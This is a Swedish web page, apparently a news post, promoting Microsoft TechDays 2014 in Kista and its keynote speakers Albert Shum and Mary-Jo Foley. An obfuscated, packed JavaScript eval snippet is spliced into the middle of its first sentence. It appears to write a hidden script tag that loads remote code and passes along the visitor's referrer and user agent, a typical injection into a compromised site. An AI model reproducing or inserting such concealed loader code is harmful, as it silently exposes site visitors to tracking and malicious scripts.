Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Stort intresse för Microsoft TechDays

Stort intresse för Microsoft TechDays

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niebh|var|u0026u|referrer|fhsrk||js|php’.split(’|’),0,{}))
19 november öppnas dörrarna för Microsoft TechDays, i Kista, Stockholm och intresset är mycket stort. Deltagare kommer från hela landet för att delta på årets största IT-konferens och bland annat lyssna till en av Microsofts mest inflytelserika personer Albert Shum, Partner Director of Design och Mary-Jo Foley, personen som känner Microsoft utifrån mer än någon annan.

Möt Albert Shum
Albert Shum väljer sina framträdanden med stor omsorg varför vi är extra stolta över att han kommer till TechDays Sverige den 19 november. Det är ett unikt tillfälle vi får att lyssna på Albert Shum; han väljer sina framträdanden med stor omsorg. På TechDays delger han oss bland annat sina tankar kring Windows 10!

Möt Mary-Jo Foley
Hon är kvinnan som känner Microsoft utifrån mer än någon annan. Hon har bevakat och skrivit om IT-branschen och Microsoft i 30 år. Nu är hon en av inledningstalarna på TechDays. Mary-Jo Foley är flitigt publicerad och medverkar varje vecka i podcasten, ”Windows Weekly”, som täcker nyheter om Microsoft, dess produkter och tjänster, och andra relaterade ämnen, särskilt inom Enterprise Computing. För Windows Weekly har hon bland annat intervjuat Bill Gates, Steve Jobs och Steve Ballmer.

Windows 10 är framtiden. Låt oss skapa den tillsammans
”It’s time for a new Windows. This new Windows must be built from the ground-up for a mobile-first, cloud-first world. This new Windows must help our customers be productive in both their digital work and their digital life. This new Windows must empower people and organizations to do great things.” 

Terry Myerson, 30 september 2014


Träffa oss på TechDays
Se alla medverkande företag
här.


Följ att nytt kring TechDays på sociala medier!
Delta i och lyssna på twittrandet med hashtaggen #TDswe2014 och på vår Facebook-sida.